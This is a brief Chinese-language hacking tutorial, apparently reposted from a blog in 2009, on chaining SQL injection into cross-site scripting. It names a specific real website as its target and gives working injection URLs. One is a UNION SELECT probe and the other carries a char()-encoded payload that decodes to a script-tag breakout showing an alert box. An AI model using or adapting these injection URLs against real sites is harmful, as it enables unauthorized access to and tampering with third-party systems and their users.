开发学院网络安全黑客技术 利用的SQL注入来玩玩跨站XSS 阅读

利用的SQL注入来玩玩跨站XSS

 2009-06-12 16:55:04 来源:WEB开发网   
核心提示:secure-hiphop的Blog 先将自己要弹出的东西编码一下 随便找的注入点例如 www.lob.polytechnique.fr/themes.php?id=1-1+union+select+1,2-- 我们就在1的位置填入转码后的代码 可爱的弹跳窗就出来了 www.lob.polytechnique.fr/t

secure-hiphop的Blog

先将自己要弹出的东西编码一下

利用的SQL注入来玩玩跨站XSS

随便找的注入点例如

www.lob.polytechnique.fr/themes.php?id=1-1+union+select+1,2--

我们就在1的位置填入转码后的代码

可爱的弹跳窗就出来了

www.lob.polytechnique.fr/themes.php?id=1-1+union+select+char(34, 62, 60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 49, 51, 51, 55, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62),2--

Tags:利用 SQL 注入

编辑录入:爽爽 [复制链接] [打 印]
[]
  • 好
  • 好的评价 如果觉得好,就请您
      0%(0)
  • 差
  • 差的评价 如果觉得差,就请您
      0%(0)
赞助商链接